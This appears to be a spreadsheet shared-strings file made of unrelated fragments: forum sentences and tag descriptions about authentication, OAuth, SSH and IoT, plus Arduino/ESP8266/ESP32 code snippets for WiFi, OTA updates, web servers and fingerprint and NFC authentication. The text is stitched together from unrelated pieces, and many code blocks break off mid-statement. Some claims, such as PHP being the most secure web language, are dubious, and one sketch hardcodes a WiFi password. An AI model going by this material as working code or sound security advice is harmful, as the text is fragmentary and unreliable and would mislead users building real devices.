  <si>
    <t>My question is it how to make it most secure?</t>
  </si>
  <si>
    <t>Mar  2 22:08:59 raspberrypi systemd[1]: Reloading OpenBSD Secure Shell server.</t>
  </si>
  <si>
    <t>Our RootCA is self-signed company root.</t>
  </si>
  <si>
    <t>I think they at least describe simple fuzzification and defuzzification routines.</t>
  </si>
  <si>
    <t>Though Bluetooth's security is questionable, it seems like the best option for your goal.</t>
  </si>
  <si>
    <t>Is is very likely that your web server is running with another user without the ability to sudo.</t>
  </si>
  <si>
    <t>Presumably, your user account is in the /etc/sudoers file, but the Web server is not.</t>
  </si>
  <si>
    <t>Not really verified with IOS native program.</t>
  </si>
  <si>
    <t>If you are using windows system use device manager to make sure your device is properly connected.</t>
  </si>
  <si>
    <t>Interrupts are generally cleaner and more reliable.</t>
  </si>
  <si>
    <t>If you have correct NWSessionKey and APPSessionKey and so on, you could try to onboard your device over Actility's free partner zone.</t>
  </si>
  <si>
    <t>For Password you need to use the Token, as well provided at the end of device registration process.</t>
  </si>
  <si>
    <t>You can find more information about authentication and authorization for AWS IoT here.</t>
  </si>
  <si>
    <t>Skipfish is an active web application security reconnaissance tool.</t>
  </si>
  <si>
    <t>Frequently used to refer to user identity and authentication.</t>
  </si>
  <si>
    <t>Everyauth is an Authentication and Authorization framework for Node.js Connect and Express apps.</t>
  </si>
  <si>
    <t>ESET NOD32 Antivirus, known also as NOD32, is an antivirus software made by ESET (a Slovak company).</t>
  </si>
  <si>
    <t>A simple Python OAuth 1.0/a, OAuth 2.0, and Ofly consumer library</t>
  </si>
  <si>
    <t>Telegram is a cross-platform cloud-based instant messenger with a focus on security.</t>
  </si>
  <si>
    <t>Logstash Forwarder is a program for securely shipping logs over a network to be ingested by Logstash.</t>
  </si>
  <si>
    <t>This tag covers OAuth usage on Yahoo APIs.</t>
  </si>
  <si>
    <t>Entrust is a plugin to add role-based permissions to Laravel.</t>
  </si>
  <si>
    <t>Hyperledger Fabric is an implementation of blockchain technology.</t>
  </si>
  <si>
    <t>Microsoft Graph Security refers to a subset of security-specific APIs in Microsoft Graph.</t>
  </si>
  <si>
    <t>Containers can either be run as root or in rootless mode.</t>
  </si>
  <si>
    <t>splint ("secure programming lint") is a lint implementation, i.e.</t>
  </si>
  <si>
    <t>`dev-certs` is a dotnet tool used to install developer certificates.</t>
  </si>
  <si>
    <t>The protocol is binary, secure, and reliable --- though these options are configurable.</t>
  </si>
  <si>
    <t>QlikView is a business intelligence platform created and distributed by Qlik Corporation.</t>
  </si>
  <si>
    <t>ZigBee is a wireless networking protocol built upon the 802.15.4 communication standard.</t>
  </si>
  <si>
    <t>It is primarily used with a username for the authorization system.</t>
  </si>
  <si>
    <t>Your application should use a custom data class that is key-value compliant whenever possible.</t>
  </si>
  <si>
    <t>It is also known for the internet security services that it distributes.</t>
  </si>
  <si>
    <t>This Free tool is for use by Quality Assurance 
Engineers and Developers.</t>
  </si>
  <si>
    <t>Everyauth is an Authentication and Authorization (password, Facebook, Twitter, OAuth &amp; more) framework for Node.js Connect and Express apps.</t>
  </si>
  <si>
    <t>A user connecting to a shared instance of LocalDB that they do not own must have a Windows Authentication or SQL Server Authentication login.</t>
  </si>
  <si>
    <t>You can use application roles to enable access to specific data to only those users who connect through a particular application.</t>
  </si>
  <si>
    <t>To run a task with permissions of a different user account or with system permissions, use the /ru parameter.</t>
  </si>
  <si>
    <t>OAuth2orize is an authorization server toolkit for Node.js.</t>
  </si>
  <si>
    <t>ShellForge is a python program that builds shellcodes from C. It is inspired from Stealth's Hellkit.</t>
  </si>
  <si>
    <t>Logstash forwarder is a program for securely shipping logs over a network to be ingested by Logstash.</t>
  </si>
  <si>
    <t>Only you can create and upload this file, so the association of your website with your app is secure.</t>
  </si>
  <si>
    <t>Hyperledger Composer provides a layer of abstraction on top of the Hyperledger Fabric blockchain.</t>
  </si>
  <si>
    <t>The profile contains information about the user such as their identity.</t>
  </si>
  <si>
    <t>Room
Access your data with the power of SQLite and safety of in-app objects.</t>
  </si>
  <si>
    <t>Intel FPGA is a company part of Intel creating FPGAs and CPLD.</t>
  </si>
  <si>
    <t>GreasemonkeyMain add-on page is a userscript manager for Firefox.</t>
  </si>
  <si>
    <t>Wi-Fi is a common synonym of wireless networking.</t>
  </si>
  <si>
    <t>Favicons help give a website identity.</t>
  </si>
  <si>
    <t>For general information about using ACM, see the AWS Certificate Manager User Guide.</t>
  </si>
  <si>
    <t>userframe is sandboxed inside another sandbox iframe with src https://*-script.googleusercontent.com.</t>
  </si>
  <si>
    <t>Userscripts are available in most browsers:
Dolphin: Userscript managers: Tampermonkey.</t>
  </si>
  <si>
    <t>The sixth field is also sometimes used for year instead of an account username, the nncron daemon for Windows does this.</t>
  </si>
  <si>
    <t>Is it possible to find out the version of another app (without needing the admin password as in the example below)?</t>
  </si>
  <si>
    <t>However, I'm still unable to have my ssh tunnel working.</t>
  </si>
  <si>
    <t>I want the device to be in standby mode and run enter_password() function by knock.</t>
  </si>
  <si>
    <t>Here's my advice:
Plugin your Arduino Board
Go to Control Panel ---&gt; System and Security ---&gt; System ---&gt; On the left pane Device Manger
Expand Other Devices.</t>
  </si>
  <si>
    <t>I just found this solution, now the ssh works:</t>
  </si>
  <si>
    <t>The error you are getting:
indicates that you have missing permission for the specified role.</t>
  </si>
  <si>
    <t>The Git Credential Manager for Windows (GCM) is a credential helper for Git.</t>
  </si>
  <si>
    <t>How to implement RESTful authentication</t>
  </si>
  <si>
    <t>$newLine);
            $smtpResponse = fgets($smtpConnect, 4096);
            $logArray['authpassword'] = "$smtpResponse";
            //email from
            fputs($smtpConnect, "MAIL FROM: &lt;$from&gt;" .</t>
  </si>
  <si>
    <t>I control it via SSH from my laptop.</t>
  </si>
  <si>
    <t>I use BitDefender Internetsecurity 2017 as protection suit.</t>
  </si>
  <si>
    <t>Bittrex is a blockchain enterprise.</t>
  </si>
  <si>
    <t>Is there any other more tested alternative for securing these interactions that doesn't involve using a more advanced platform?</t>
  </si>
  <si>
    <t>But I require that the Arduino acts as multiple devices by registering itself with multiple i2c addresses.</t>
  </si>
  <si>
    <t>The Apache Oltu project delivers a Java development framework mainly aimed to build OAuth-aware applications.</t>
  </si>
  <si>
    <t>Because for getting information, that sensor details should be in the consideration of raspberry pi developers.</t>
  </si>
  <si>
    <t>PHP is pretty much, hands down, the most secure language for the web.</t>
  </si>
  <si>
    <t>A location or file that stores other files or data, normally accompanied by compression, encryption, sorting or organizing.</t>
  </si>
  <si>
    <t>IEEE 802.11p is an approved amendment to the IEEE 802.11 standard to add wireless access in vehicular environments (WAVE), a vehicular communication system.</t>
  </si>
  <si>
    <t>Whenever it runs update-ca-certificates, this is the output: 
It doesn't say which shared library is the problem.</t>
  </si>
  <si>
    <t>Only an option if you really trust the user-space app, and even then, risky.</t>
  </si>
  <si>
    <t>Also a SYN flood is an old denial of service vector that most servers will protect against.</t>
  </si>
  <si>
    <t>In terms of rooting the device, this would be helpful as you would get more access to system level APIs.</t>
  </si>
  <si>
    <t>To do this, your Raspberry Pi has to have internet connectivity and you have to build the web service.</t>
  </si>
  <si>
    <t>The Design Philosophy of UWP app is for security, that's why it only deals with well-known file types.</t>
  </si>
  <si>
    <t>Although I have never tried it or have experience in this area, there is a way to expose SOAP web services from the oracle database.</t>
  </si>
  <si>
    <t>In the case of using your own container registry (not Microsoft), you MUST fill authorization parameters.</t>
  </si>
  <si>
    <t>Over the years, it has matured into a very testable and secure system for creating Java-based webapps.</t>
  </si>
  <si>
    <t>This tag is used for Google's Identity Toolkit(gitkit) library for Node server</t>
  </si>
  <si>
    <t>For more information, please see the Identity Toolkit documentation.</t>
  </si>
  <si>
    <t>It can be used to protect data "at rest", such as files on computers and storage devices (e.g.</t>
  </si>
  <si>
    <t>I have found this approach very reliable and safe.</t>
  </si>
  <si>
    <t>The API allows you to programmatically manage Sponsored Products campaigns, ad groups, ads, keywords, bids, and budgets.</t>
  </si>
  <si>
    <t>It helps with everyday task, makes code more robust and reliable.</t>
  </si>
  <si>
    <t>The deletion scripts have the particularity that are not invoked by the admin but by impersonating the users themselves.</t>
  </si>
  <si>
    <t>Git-CVS is the server component of the Git source code management system that allows it to masquerade as a CVS repository.</t>
  </si>
  <si>
    <t>Links
Criterion on Hackage</t>
  </si>
  <si>
    <t>Forum - Perhaps the most practical Phalcon application out there, which is readily available to the public, requiring users to use their github account for authentication.</t>
  </si>
  <si>
    <t>I am working on an Arduino project which is required an authorized authentication based on OAuth 1.0 to connects to the cloud.</t>
  </si>
  <si>
    <t>Solution 2: Use a GPS module and sync the time with that.This will not work properly until your get you GPS locked.</t>
  </si>
  <si>
    <t>In pre-iOS7 devices, all the applications on a single device would get the same device token when registering to Apple Push Notifications.</t>
  </si>
  <si>
    <t>The identity property is used to follow a specific touch across its lifetime.</t>
  </si>
  <si>
    <t>write-only to a specific Cloud Storage bucket) to limit what it could do if it were compromised.</t>
  </si>
  <si>
    <t>I'm experimenting on using LXD but being new to virtualization, I am stumped with creating an unprivileged container.</t>
  </si>
  <si>
    <t>On the other hand when raspberry pi starts itself with pi user, I want backend process to be running as root.</t>
  </si>
  <si>
    <t>Snyk is a service that monitors your application dependencies and let you know when you're open to vulnerabilities.</t>
  </si>
  <si>
    <t>Obviously you can open the necessary registry key programmatically looking for the device ID of the Arduino device.</t>
  </si>
  <si>
    <t>The sfDoctrineGuard plugin is a Symfony plugin providing user authentication and access management.</t>
  </si>
  <si>
    <t>This is all for a very intricate door control system with maglocks.</t>
  </si>
  <si>
    <t>// Sketch shows how to switch between WiFi and BlueTooth or use both
// Button is attached between GPIO 0 and GND and modes are switched with each press
#include &lt;WiFi.h&gt;
#include &lt;Wire.h&gt;
#include &lt;LiquidCrystal.h&gt;
#define STA_SSID "HIDDEN FOR SECURITY"
#define STA_PASS "HIDDEN FOR SECURITY"
#define AP_SSID  "esp32 @ my desk"
#define LED_PIN  5
//LCD variables on analog inputs, but used as digital I/O
//lcd_gnd = gnd
//lcd_vcc = +5v
//lcd_v0 = +5v &amp; pot
const int lcd_rs = 27;
//lcd_rw = gnd
const int lcd_e = 14;
//lcd_d0 = n/a
//lcd_d1 = n/a
//lcd_d2 = n/a
//lcd_d3 = n/a
const int lcd_d4 = 32;
const int lcd_d5 = 33;
const int lcd_d6 = 25;
const int lcd_d7 = 26;
//lcd_bl1 = +5v
//lcd_bl2 = gnd
LiquidCrystal lcd(lcd_rs, lcd_e, lcd_d4, lcd_d5, lcd_d6, lcd_d7);
enum { STEP_BTON, STEP_BTOFF, STEP_STA, STEP_AP, STEP_AP_STA, STEP_OFF, STEP_BT_STA, STEP_END };
void onButton(){
  static uint32_t step = STEP_BTON;
  switch(step){
    case STEP_BTON://BT Only
      lcd.clear();
      lcd.setCursor(0, 0);
      lcd.print("Starting BT");
      btStart();
    break;
    case STEP_BTOFF://All Off
      lcd.clear();
      lcd.setCursor(0, 0);
      lcd.print("Stopping BT");
      btStop();
    break;
    case STEP_STA://STA Only
      lcd.clear();
      lcd.setCursor(0, 0);
      lcd.print("Starting STA");
      WiFi.begin(STA_SSID, STA_PASS);
    break;
    case STEP_AP://AP Only
      lcd.clear();
      lcd.setCursor(0, 0);
      lcd.print("Stopping STA");
      WiFi.mode(WIFI_AP);
      lcd.clear();
      lcd.setCursor(0, 0);
      lcd.print("Starting AP");
      WiFi.softAP(AP_SSID);
    break;
    case STEP_AP_STA://AP+STA
      lcd.clear();
      lcd.setCursor(0, 0);
      lcd.print("Starting STA");
      WiFi.begin(STA_SSID, STA_PASS);
    break;
    case STEP_OFF://All Off
      lcd.clear();
      lcd.setCursor(0, 0);
      lcd.print("Stopping WiFi");
      WiFi.mode(WIFI_OFF);
    break;
    case STEP_BT_STA://BT+STA
      lcd.clear();
      lcd.setCursor(0, 0);
      lcd.print("Starting STA+BT");
      WiFi.begin(STA_SSID, STA_PASS);
      btStart();
    break;
    case STEP_END://All Off
      lcd.clear();
      lcd.setCursor(0, 0);
      lcd.print("Stopping WiFi+BT");
      WiFi.mode(WIFI_OFF);
      btStop();
    break;
    default:
    break;
  }
  if(step == STEP_END){
    step = STEP_BTON;
  } else {
    step++;
  }
  //little debounce
  delay(100);
}
void WiFiEvent(WiFiEvent_t event){
    switch(event) {
        case SYSTEM_EVENT_AP_START:
            lcd.clear();
            lcd.setCursor(0, 0);
            lcd.print("AP Started");
            Serial.print("AP Started");
            WiFi.softAPsetHostname(AP_SSID);
            break;
        case SYSTEM_EVENT_AP_STOP:
            lcd.clear();
            lcd.setCursor(0, 0);
            lcd.print("AP Stopped");
            Serial.print("AP Stopped");
            break;
        case SYSTEM_EVENT_STA_START:
            lcd.clear();
            lcd.setCursor(0, 0);
            lcd.print("STA Started");
            Serial.print("STA Started");
            WiFi.setHostname(AP_SSID);
            break;
        case SYSTEM_EVENT_STA_CONNECTED:
            lcd.clear();
            lcd.setCursor(0, 0);
            lcd.print("STA Connected");
            Serial.print("STA Connected");
            WiFi.enableIpV6();
            break;
        case SYSTEM_EVENT_AP_STA_GOT_IP6:
            lcd.clear();
            lcd.setCursor(0, 0);
            lcd.print("STA IPv6: ");
            Serial.print("STA IPv6: ");
            Serial.println(WiFi.localIPv6());
            break;
        case SYSTEM_EVENT_STA_GOT_IP:
            lcd.clear();
            lcd.setCursor(0, 0);
            lcd.print("STA IPv4: ");
            Serial.print("STA IPv4: ");
            lcd.setCursor(0,1);
            lcd.print(WiFi.localIP());
            Serial.print(WiFi.localIP());
            break;
        case SYSTEM_EVENT_STA_DISCONNECTED:
            lcd.clear();
            lcd.setCursor(0, 0);
            lcd.print("STA Disconnected");
            Serial.print("STA Disconnected");
            break;
        case SYSTEM_EVENT_STA_STOP:
            lcd.clear();
            lcd.setCursor(0, 0);
            lcd.print("STA Stopped");
            Serial.print("STA Stopped");
            break;
        default:
            break;
    }
}
void setup() {
    lcd.begin(16, 2); //tells arduino that the LCD is a 16x2 size LCD
    lcd.clear(); //clear any previous text
    lcd.setCursor(0, 0); // set cursor to column 0 of row 0 (first row, first block)
    pinMode(LED_PIN, OUTPUT);
    digitalWrite(LED_PIN, LOW); // LED off
    Serial.begin(115200);
    pinMode(0, INPUT_PULLUP);
    WiFi.onEvent(WiFiEvent);
    Serial.print("ESP32 SDK: ");
    Serial.println(ESP.getSdkVersion());
    Serial.println("Press the button to select the next mode");
    lcd.setCursor(0, 0);
    lcd.println("Press mode btn");
}
void loop() {
    digitalWrite(LED_PIN, HIGH); // Turn on LED
    static uint8_t lastPinState = 1;
    uint8_t pinState = digitalRead(0);
    if(!pinState &amp;&amp; lastPinState){
        onButton();
    }
    lastPinState = pinState;
}</t>
  </si>
  <si>
    <t>Microchip/BLE Config</t>
  </si>
  <si>
    <t>const char* ssid = "ESP123";
const char* password = "lol12345";//Fixed - Edited per Dan Davis comment 
const char* host = "192.168.4.1";
WiFiServer server(80);
void setup(){
  int count = 0;
  Serial.begin(115200);
  delay(10);
  Serial.print("Connecting to: ");
  Serial.print(ssid);
  Serial.println();
  WiFi.mode(WIFI_STA);
  WiFi.begin(ssid, password);
  delay(10);
  WiFi.disconnect();      //disconnect any previous connections
  delay(1000);
  Serial.print("Nearby networks found  :");   //scan for number of nearby networks &amp; print SSIDs
  Serial.println(WiFi.scanNetworks());
  delay(500);
  Serial.println("List of surrounding Network SSIDs:");
  int n = WiFi.scanNetworks();
  for (int i = 0; i &lt; n; i++)
    {
    Serial.println(WiFi.SSID(i));
    }
  Serial.println();
  WiFi.begin(ssid, password);       //connect to preferred SSID
  Serial.println("Connecting");
  while (WiFi.status() != WL_CONNECTED)
    {
    delay(500);
    Serial.print(".</t>
  </si>
  <si>
    <t>Full ARDUINO CODE
#include&lt;ESP8266WiFi.h&gt; 
#define TRIGGER 5
#define ECHO  4
#define TRIGGER2 13
#define ECHO2 15
#define LEDRED 14 
#define LEDGREEN 12 
const char* ssid = "sample";
const char* password ="sample"; 
const char* host ="192.168.254.77";
String status1;
//String parking_lot;
 long sensor;
 long sensor2;
void setup(){ 
 pinMode(LEDRED,OUTPUT);
 pinMode(LEDGREEN,OUTPUT);
 pinMode(sensor, INPUT);
 pinMode(sensor2, INPUT);
 delay(1000);
 pinMode(TRIGGER, OUTPUT);
 pinMode(ECHO, INPUT); 
  delay(1000);
  Serial.begin(115200);
  delay(10); 
  pinMode(TRIGGER2, OUTPUT);
 pinMode(ECHO2, INPUT); 
  delay(1000);
  Serial.begin(115200);
  delay(10);
  Serial.println();
  Serial.println();
  Serial.print("connecting to ");
  Serial.println(ssid); 
  WiFi.begin(ssid,password); 
  while(WiFi.status() != WL_CONNECTED) {
      delay(500);
      Serial.print(".</t>
  </si>
  <si>
    <t>#include &lt;ArduinoHttpClient.h&gt;
    #include &lt;WiFiNINA.h&gt;
    #include "arduino_secrets.h"
    #include "SocketIOClient.h"
    char ssid[] = SECRET_SSID;
    char pass[] = SECRET_PASS;
    char serverAddress[] = "192.168.1.134";  // server address
    int port = 8000;
    WiFiClient wifi;
    SocketIOClient client; // socketIO version of bellow
    int status = WL_IDLE_STATUS;
    void ondata(SocketIOClient client, char *data) {
      Serial.print(data);
    }
    void setup() {
      Serial.begin(9600);
      while ( status != WL_CONNECTED) {
        Serial.print("Attempting to connect to Network named: ");
        Serial.println(ssid);
        status = WiFi.begin(ssid, pass);
      }
      Serial.print("SSID: ");
      Serial.println(WiFi.SSID());
      IPAddress ip = WiFi.localIP();
      Serial.print("IP Address: ");
      Serial.println(ip);
      client.setDataArrivedDelegate(ondata);
      if (!client.connect(serverAddress, port)) Serial.println(F("Not connected.</t>
  </si>
  <si>
    <t>");
  }
  Serial.println("");
  Serial.println("WiFi connected");
  Serial.println("IP address: ");
  Serial.println(WiFi.localIP());
  //Attempt to connect to the host and port specified
  WiFiClientSecure client;
  Serial.print("Connecting to ");
  Serial.println(host);
  if (!client.connect(host, httpsPort)){
    Serial.println("Connection failed");
    return;
  }
   //Compare the Certificate returned with the one we manually obtained
   if (client.verify(fingerprint, host)) {
    Serial.println("certificate matches");
  } else {
    Serial.println("certificate doesn't match");
    return;
  }
  Serial.print("Requesting url ");
  Serial.println (url);
    client.print(String("GET ") + url + " HTTP/1.1\r\n" +
               "Host: " + host + "\r\n" +
               "User-Agent: ArduinoESP8266\r\n" +
               "Connection: close\r\n\r\n");
  Serial.println("request sent");
   // Check HTTP status
  char status[32] = {0};
  client.readBytesUntil('\r', status, sizeof(status));
  // It should be "HTTP/1.0 200 OK" or "HTTP/1.1 200 OK"
  if (strcmp(status + 9, "200 OK") != 0) {
    Serial.print(F("Unexpected response: "));
    Serial.println(status);
    return;
  }
  // Skip HTTP headers
  char endOfHeaders[] = "\r\n\r\n";
  if (!client.find(endOfHeaders)) {
    Serial.println(F("Invalid response"));
    return;
  }
  String line = client.readStringUntil('\n');
  String toReplace = "\"";
  String replacedBy = "\\\"";
  line.replace(toReplace, replacedBy);
  //line = "{\"meta\":{\"name\":\"openaq-api\",\"license\":\"CC BY 4.0\",\"website\":\"https://docs.openaq.org/\",\"page\":1,\"limit\":1,\"found\":1955},\"results\":[{\"location\":\"Birmingham Acocks Green\",\"parameter\":\"pm25\",\"date\":{\"utc\":\"2019-06-26T12:00:00.000Z\",\"local\":\"2019-06-26T13:00:00+01:00\"},\"value\":5,\"unit\":\"g/m\",\"coordinates\":{\"latitude\":52.437165,\"longitude\":-1.829999},\"country\":\"GB\",\"city\":\"Birmingham\"}]}";
  Serial.println(line);
  int line_len = line.length() + 1;
  char char_array[line_len];
  line.toCharArray(char_array,line_len);
  //send the String object to the input of the DeserializeJson
  DynamicJsonDocument doc(1200);
  deserializeJson(doc,char_array);
  JsonObject obj = doc.as&lt;JsonObject&gt;();
  String nameAQ = obj[String("meta")];
  Serial.println(nameAQ);
  JsonArray results = obj["results"];
  JsonObject results_0 = results[0];
  int results_0_value = results_0["value"];
  Serial.println(results_0_value);
}
When I Serial.print() the content of meta i expect to return
{"name":"openaq-api","license":"CC BY 4.0","website":"https://docs.openaq.org/","page":1,"limit":1,"found":1955}
but it outputs null
when I  Serial.print() the results_0_value int I expect it to return whatever value is in the JSON but it outputs 0</t>
  </si>
  <si>
    <t>");
  } else if (p == FINGERPRINT_PACKETRECIEVEERR) {
    Serial.println("Communication error");
    //Additional feature
      Serial.print("Repeat id #");Serial.println(id);
      id--;
    return p;
  } else if (p == FINGERPRINT_ENROLLMISMATCH) {
    Serial.println("Fingerprints did not match");
    //Additional feature
      Serial.print("Repeat id #");Serial.println(id);
      id--;
    return p;
  } else {
    Serial.println("Unknown error");
    //Additional feature
      Serial.print("Repeat id #");Serial.println(id);
      id--;
    return p;
  }   
  Serial.print("ID "); Serial.println(id);
  p = finger.storeModel(id);
  if (p == FINGERPRINT_OK) {
    Serial.println("Stored!</t>
  </si>
  <si>
    <t>Firebase.py
from firebase import firebase
import RPi.GPIO as GPIO
import time
firebase = firebase.FirebaseApplication('https://raspberrypi-5c0ce.firebaseio.com/', authentication = None)
#result = firebase.put('/light_switch','state', 'off')
#currentState = firebase.get('/light_switch', 'state')
#print(currentState)
#Initialize gpio settings
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
#Initialize gpio board
input1 = 26
input2 = 19
#setup led color with gpio setup
GPIO.setup(input1, GPIO.OUT)
GPIO.setup(input2, GPIO.OUT)
#GPIO.setup(yellowLed, GPIO.OUT)
#output actual color of led based on variableColor and 1 for tru
while True:
    currentState = firebase.get('/light_switch', 'state')
#print(currentState)
    if currentState == "on":
        GPIO.output(input1, 1)
        GPIO.output(input2, 1)
    #print("on")
    else:
        GPIO.output(input1, 0)
        GPIO.output(input1, 0)
    #print("off")</t>
  </si>
  <si>
    <t>MODIFIED CODE:
ESP266 code
    #include &lt;AltSoftSerial.h&gt;
AltSoftSerial ESP8266 ;//(8,9)|Rx,Tx
int LED = 13;
boolean FAIL_8266 = false;
#define BUFFER_SIZE 128
char buffer[BUFFER_SIZE];
String ssid="\"SSID\"";
String pass="\"PASSWORD\"";
void clearESP8266SerialBuffer()
{
  Serial.println("= clearESP8266SerialBuffer() =");
  while (ESP8266.available() &gt; 0) {
    char a = ESP8266.read();
    Serial.write(a);
  }
  Serial.println("==============================");
}
void sendHTTPResponse(int id, String content)
{
  String response;
  response = "HTTP/1.1 200 OK\r\n";
  response += "Content-Type: text/html; charset=UTF-8\r\n"; 
  response += "Content-Length: ";
  response += content.length();
  response += "\r\n";
  response +="Connection: close\r\n\r\n";
  response += content;
  String cmd = "AT+CIPSEND=";
  cmd += id;
  cmd += ",";
  cmd += response.length();
  Serial.println("--- AT+CIPSEND ---");
  sendESP8266Cmdln(cmd, 1000);
  Serial.println("--- data ---");
  sendESP8266Data(response, 1000);
}
boolean waitOKfromESP8266(int timeout)
{
  do{
    Serial.println("wait OK...");
    delay(1000);
    if(ESP8266.find("OK"))
    {
      return true;
    }
  }while((timeout--)&gt;0);
  return false;
}
//Send command to ESP8266, assume OK, no error check
//wait some time and display respond
void sendESP8266Cmdln(String cmd, int waitTime)
{
  ESP8266.println(cmd);
  delay(waitTime);
  clearESP8266SerialBuffer();
}
//Basically same as sendESP8266Cmdln()
//But call ESP8266.print() instead of call ESP8266.println()
void sendESP8266Data(String data, int waitTime)
{
  ESP8266.print(data);
  delay(waitTime);
  clearESP8266SerialBuffer();
}
void adc()
{
  int ldr;
  for(int i=0;i&lt;=3;i++)
  {
    ldr = analogRead(A0); 
    sendESP8266Cmdln("AT+CIPSEND=0,5",1000);
    sendESP8266Cmdln(String(ldr),1000); 
    delay(1000);
  }
}
void setup() 
{
  Serial.begin(9600);
  ESP8266.begin(9600);
  pinMode(LED,OUTPUT);
  do{
  ESP8266.println("AT+RST");
    delay(1000);
    if(ESP8266.find("Ready"))
    {
      Serial.println("Module is ready");
      delay(1000);
      clearESP8266SerialBuffer();
      sendESP8266Cmdln("AT+CWMODE=1",1000);
      //Join Wifi network
      sendESP8266Cmdln("AT+CWJAP="+ssid+","+pass,6500);
      //Get and display my IP
      sendESP8266Cmdln("AT+CIFSR", 1000);  
      //Set multi connections
      sendESP8266Cmdln("AT+CIPMUX=1", 1000);
      //Setup web server on port 80
      sendESP8266Cmdln("AT+CIPSERVER=1,3333",1000);
      Serial.println("Server setup finish");
      FAIL_8266 = false;
    }else{
      Serial.println("Module have no response.</t>
  </si>
  <si>
    <t>My Arduino code is for ESP8266 is:
#include &lt;ESP8266WiFi.h&gt;
const char* ssid = "--";
const char* password = "--";
WiFiServer server(80);
void setup() {
  Serial.begin(115200);
  delay(10);
  pinMode(14, OUTPUT);  pinMode(12, OUTPUT);  pinMode(13, OUTPUT);  pinMode(15, OUTPUT);
  digitalWrite(14, LOW);digitalWrite(12, LOW);digitalWrite(13, LOW);digitalWrite(15, LOW);  digitalWrite(2,LOW);
  // Connect to WiFi network
  Serial.println();
  Serial.println();
  Serial.print("Connecting to ");
  Serial.println(ssid);
IPAddress ip(192, 168, 0, 106);
IPAddress gateway(192, 168, 0, 1);
IPAddress subnet(255, 255, 255, 0);
IPAddress dns(192, 168, 0, 1);
// Static IP Setup Info Here...
WiFi.config(ip,dns, gateway, subnet); //If you need Internet Access You should Add DNS also... 
WiFi.begin(ssid, password);
  while (WiFi.status() != WL_CONNECTED) {
    delay(500);
    Serial.print(".</t>
  </si>
  <si>
    <t>Rebooting..." );
    delay( 10 );
    ESP.restart();
  }
  ArduinoOTA.setPort(53232);
  ArduinoOTA.setHostname("LOLIN_D32_PRO_Sunkyue");
  ArduinoOTA.setPassword("XXXXXX");
  ArduinoOTA
    .onStart([]() {
      String type;
      if (ArduinoOTA.getCommand() == U_FLASH)
        type = "sketch";
      else // U_SPIFFS
        type = "filesystem";
      // NOTE: if updating SPIFFS this would be the place to unmount SPIFFS using SPIFFS.end()
      Serial.println("Start updating " + type);
    })
    .onEnd([]() {
      Serial.println("\nEnd");
    })
    .onProgress([](unsigned int progress, unsigned int total) {
      Serial.printf("Progress: %u%%\r", (progress / (total / 100)));
    })
    .onError([](ota_error_t error) {
      Serial.printf("Error[%u]: ", error);
      if (error == OTA_AUTH_ERROR) Serial.println("Auth Failed");
      else if (error == OTA_BEGIN_ERROR) Serial.println("Begin Failed");
      else if (error == OTA_CONNECT_ERROR) Serial.println("Connect Failed");
      else if (error == OTA_RECEIVE_ERROR) Serial.println("Receive Failed");
      else if (error == OTA_END_ERROR) Serial.println("End Failed");
    });
  ArduinoOTA.begin();
  Serial.println("Ready");
  Serial.print("IP address: ");
  Serial.println(WiFi.localIP());
}
void OTAHandle(){
  ArduinoOTA.handle();
}
WEBSERVER CODE : 
#include &lt;WiFiClient.h&gt;
#include &lt;WebServer.h&gt;
WebServer server(80);
void handleRoot() {
  char temp[400];
  int sec = millis() / 1000;
  int min = sec / 60;
  int hr = min / 60;
  snprintf(temp, 400,
           "&lt;html&gt;\
  &lt;head&gt;\
    &lt;meta http-equiv='refresh' content='0.5'/&gt;\
    &lt;title&gt;ESP32 Demo&lt;/title&gt;\
    &lt;style&gt;\
      body { background-color: #cccccc; font-family: Arial, Helvetica, Sans-Serif; Color: #000088; }\
    &lt;/style&gt;\
  &lt;/head&gt;\
  &lt;body&gt;\
    &lt;h1&gt;Hello from ESP32!&lt;/h1&gt;\
    &lt;p&gt;Uptime: %02d:%02d:%02d&lt;/p&gt;\
    &lt;img src=\"/test.svg\" /&gt;\
  &lt;/body&gt;\
&lt;/html&gt;",
           hr, min % 60, sec % 60
          );
  server.send(200, "text/html", temp);
}
void handleNotFound() {
  String message = "File Not Found\n\n";
  message += "URI: ";
  message += server.uri();
  message += "\nMethod: ";
  message += (server.method() == HTTP_GET) ?</t>
  </si>
  <si>
    <t>Below is what I have tried so far:
NetworkInterface class
(originally designed to hold the entire instantiated WiFi class, but currently just using WiFiClient):
main class:
// main.cpp:
#include &lt;SPI.h&gt;
#include &lt;WiFi101.h&gt;
#include "arduino_secrets.h"
#include "network-interface.h"
char ssid[] = SECRET_SSID;        // your network SSID (name)
char pass[] = SECRET_PASS;    // your network password (use for WPA, or use as key for WEP)
int keyIndex = 0;            // your network key Index number (needed only for WEP)
int status = WL_IDLE_STATUS;
char server[] = "www.google.com";    // name address for Google (using DNS)
WiFiClient client;
NetworkInterface networkInterface;
void setup() {
    //Initialize serial and wait for port to open:
    Serial.begin(9600);
    while (!Serial);
    Serial.println("= = = Simple Client-Server Test = = = ");
    WiFi.setPins(A5, A4, A3, A2);
    if (WiFi.status() == WL_NO_SHIELD) {
        Serial.println("WiFi shield not present");
        while (true);
    }
    // attempt to connect to WiFi network:
    while (status != WL_CONNECTED) {
        Serial.print("Attempting to connect to SSID: ");
        Serial.println(ssid);
        // Connect to WPA/WPA2 network.</t>
  </si>
  <si>
    <t>I am getting this error:
Error:
My code:
#include &lt;ESP8266WiFi.h&gt;
#include &lt;Servo.h&gt;
const char* ssid = "ssid name";
const char* password = "password";
Servo servo;//create servo object to control a servo 12 servo 
//object can be created on most boards
// Create an instance of the server
// specify the port to listen on as an argument
WiFiServer server(80);
servo.attach(2); // attaches the servo on GPIO2 to the servo 
object 
//int ledPin = 13;
void setup() {
  Serial.begin(115200);
  delay(1000);
  //connect to wifi network
  Serial.println();
  Serial.println();
  Serial.print("Connecting to ..");
  Serial.print(ssid);
  WiFi.begin(ssid);
  while(WiFi.status()!= WL_CONNECTED) {
    delay(500);
    Serial.print(".</t>
  </si>
  <si>
    <t>Step: Use PWD_AUTH command to try to get a PAck
  if (!Fail)
  {
      Serial.println("Send the PWD_AUTH command...");
      success = nfc.mifareultralight_IntoAuth(Password, Response);
      // If the success code is 0xFF, we can check the response
      // print success code
      Serial.print("Success code: 0x");Serial.println(success,HEX);
      // print response code
      Serial.print("Response code:");
      int j;
      for(j=0;j&lt;4;j++)
      {
        Serial.print(" 0x");Serial.print(Response[j],HEX);
      }     
      //nfc.PrintHexChar(data, 4);
